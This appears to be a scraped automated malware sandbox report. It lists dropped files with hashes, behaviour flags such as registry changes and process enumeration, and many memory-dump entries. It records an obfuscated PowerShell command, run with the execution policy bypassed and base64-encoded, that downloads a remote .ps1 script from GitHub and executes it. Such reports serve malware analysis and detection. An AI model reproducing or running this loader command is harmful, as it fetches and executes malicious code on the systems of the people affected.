C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES313E.tmpMD5
7261a708ffd78e9400bf926ba35534c7
SHA1a60419a32f6cec0de56c38368b50c12bd16220c1
SHA256b566074992bb2400ef0b048eb1dd1ba059d9b9d8c7eecc20f4c3deddb270c109
SHA512200059a6122f7076057846046ec29523c605dce58eaa3b85817d9f034ec0f2762ad8ca8764fa80b5de8abbabf1334e76dcec3ffb0176bb2637a2a59e6b563fd2
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
dac6b25db50155c0c78d5bf64fb95fa3
SHA19e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
SHA2566967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
SHA512679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
7cac19b2868c41555db4b71219217f9b
SHA1d6f77db578db3c5c572c3a944d9072ed00560dcb
SHA256d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
SHA5125bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6
-
C:\Users\Admin\AppData\Local\Temp\grbppf0q\grbppf0q.dllMD5
0c490ce7a6b73184b0b5278f5aacaf2c
SHA1893c5880833f6a4885dba15d51e909f95f340e71
SHA256615dc4c71aba291d2ced322a4d555deff513ac9b741eb6b66fd8851b47b74e63
SHA512a5b7d691e0f5bf512b6a0d6f9cc1069165bc70f5c088d09be54105e62df94ce39b589cda02cbef0cbee9e64322ede5076d2a6f5eafb757ad072091ba3769199d
-
C:\Windows\system32\rfxvmt.dllMD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\grbppf0q\CSCA2FC6678DAEE47CDA4BB873730E22194.TMPMD5
93287916571b71592295cb7840532dc5
SHA1b37054cf6ed6020c3e2ca74d7757b533f0e6f4e5
SHA256c39d3257eb57ef618753aa7d8119b0bb7b3bd786e080124c13878c0708f9ae56
SHA512cf199e14ea79734b31f02f6b29be7c304a6cc67dbfd9b2fdb0f8ff66d8c9a8ebfb3e677b5394c87107ca0018921ca9560c78f5e9781cedafacf543eeced47e31
-
\??\c:\Users\Admin\AppData\Local\Temp\grbppf0q\grbppf0q.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\grbppf0q\grbppf0q.cmdlineMD5
8f50ff5ccaa6bfc250371e26fcd4fc92
SHA19b9eb412509f63b1d6448dafe15f6297ad55095a
SHA2563aae583b0baf4a5afd0eff5915df89def228a9a845da6e5f901132a2e42941c1
SHA512ecd24e3c9b79ef2dfcf8bafe9be746af3d6374df409c7cd98bb6bdd746bfc0aa06eba7ccebe3ff8e3cd72e1089bbad9f00e62566186a19c777bbb4e91817aa2e
-
\Windows\Branding\mediasrv.pngMD5
eeb448ea2709c57b9ea2e223d0c79396
SHA138331dd027386151ee37a29a7820570a76427b02
SHA256c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
SHA512c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc
-
\Windows\Branding\mediasvc.pngMD5
bb873bd05a47f502ee4ed3c4ea749a4f
SHA1e55a6bf49a4833fb9e9b123df39dac9bf507f75a
SHA256a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
SHA512ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
-
memory/292-76-0x0000000000000000-mapping.dmp
-
memory/300-10-0x0000000000000000-mapping.dmp
-
memory/392-67-0x0000000000000000-mapping.dmp
-
memory/460-66-0x0000000000000000-mapping.dmp
-
memory/476-46-0x0000000000000000-mapping.dmp
-
memory/540-53-0x0000000000000000-mapping.dmp
-
memory/672-39-0x0000000000000000-mapping.dmp
-
memory/812-57-0x0000000000000000-mapping.dmp
-
memory/880-88-0x0000000000000000-mapping.dmp
-
memory/880-48-0x0000000000000000-mapping.dmp
-
memory/916-72-0x0000000000000000-mapping.dmp
-
memory/916-40-0x0000000000000000-mapping.dmp
-
memory/980-80-0x0000000000000000-mapping.dmp
-
memory/980-49-0x0000000000000000-mapping.dmp
-
memory/1000-56-0x0000000000000000-mapping.dmp
-
memory/1052-100-0x0000000001320000-0x0000000001321000-memory.dmpFilesize
4KB
-
memory/1052-109-0x0000000019F20000-0x0000000019F21000-memory.dmpFilesize
4KB
-
memory/1052-82-0x000007FEF5580000-0x000007FEF5F6C000-memory.dmpFilesize
9.9MB
-
memory/1052-101-0x00000000193D0000-0x00000000193D1000-memory.dmpFilesize
4KB
-
memory/1052-108-0x00000000193C0000-0x00000000193C1000-memory.dmpFilesize
4KB
-
memory/1052-98-0x0000000001290000-0x0000000001291000-memory.dmpFilesize
4KB
-
memory/1052-97-0x0000000000BF0000-0x0000000000BF1000-memory.dmpFilesize
4KB
-
memory/1052-99-0x00000000193B0000-0x00000000193B1000-memory.dmpFilesize
4KB
-
memory/1052-116-0x00000000194A0000-0x00000000194A1000-memory.dmpFilesize
4KB
-
memory/1052-64-0x0000000000000000-mapping.dmp
-
memory/1052-92-0x0000000000F80000-0x0000000000F81000-memory.dmpFilesize
4KB
-
memory/1052-81-0x0000000000000000-mapping.dmp
-
memory/1052-117-0x000000001AC10000-0x000000001AC11000-memory.dmpFilesize
4KB
-
memory/1164-63-0x0000000000000000-mapping.dmp
-
memory/1224-79-0x0000000000000000-mapping.dmp
-
memory/1236-33-0x0000000001F70000-0x0000000001F71000-memory.dmpFilesize
4KB
-
memory/1236-17-0x00000000023D0000-0x00000000023D1000-memory.dmpFilesize
4KB
-
memory/1236-2-0x0000000000000000-mapping.dmp
-
memory/1236-3-0x000007FEF5580000-0x000007FEF5F6C000-memory.dmpFilesize
9.9MB
-
memory/1236-4-0x0000000001FB0000-0x0000000001FB1000-memory.dmpFilesize
4KB
-
memory/1236-5-0x000000001ADA0000-0x000000001ADA1000-memory.dmpFilesize
4KB
-
memory/1236-6-0x00000000024F0000-0x00000000024F1000-memory.dmpFilesize
4KB
-
memory/1236-7-0x0000000001D40000-0x0000000001D41000-memory.dmpFilesize
4KB
-
memory/1236-9-0x000000001C3C0000-0x000000001C3C1000-memory.dmpFilesize
4KB
-
memory/1236-18-0x0000000002760000-0x0000000002761000-memory.dmpFilesize
4KB
-
memory/1236-21-0x000000001AB00000-0x000000001AB01000-memory.dmpFilesize
4KB
-
memory/1236-34-0x0000000001F80000-0x0000000001F81000-memory.dmpFilesize
4KB
-
memory/1236-35-0x000000001B8D0000-0x000000001B8D1000-memory.dmpFilesize
4KB
-
memory/1236-38-0x0000000001F40000-0x0000000001F50000-memory.dmpFilesize
64KB
-
memory/1336-45-0x0000000000000000-mapping.dmp
-
memory/1376-47-0x0000000000000000-mapping.dmp
-
memory/1440-55-0x0000000000000000-mapping.dmp
-
memory/1444-54-0x0000000000000000-mapping.dmp
-
memory/1540-70-0x0000000000000000-mapping.dmp
-
memory/1572-58-0x0000000000000000-mapping.dmp
-
memory/1596-44-0x0000000000000000-mapping.dmp
-
memory/1600-43-0x0000000000000000-mapping.dmp
-
memory/1600-75-0x0000000000000000-mapping.dmp
-
memory/1604-61-0x0000000000000000-mapping.dmp
-
memory/1620-73-0x0000000000000000-mapping.dmp
-
memory/1636-52-0x0000000000000000-mapping.dmp
-
memory/1664-42-0x0000000000000000-mapping.dmp
-
memory/1684-41-0x0000000000000000-mapping.dmp
-
memory/1692-13-0x0000000000000000-mapping.dmp
-
memory/1692-50-0x0000000000000000-mapping.dmp
-
memory/1700-0-0x00000000010F0000-0x000000000142D000-memory.dmpFilesize
3.2MB
-
memory/1700-1-0x0000000001430000-0x0000000001441000-memory.dmpFilesize
68KB
-
memory/1724-62-0x0000000000000000-mapping.dmp
-
memory/1912-51-0x0000000000000000-mapping.dmp
-
memory/1912-69-0x0000000000000000-mapping.dmp
-
memory/1952-78-0x0000000000000000-mapping.dmp
-
memory/1952-87-0x0000000000000000-mapping.dmp
-
memory/2028-36-0x0000000000000000-mapping.dmp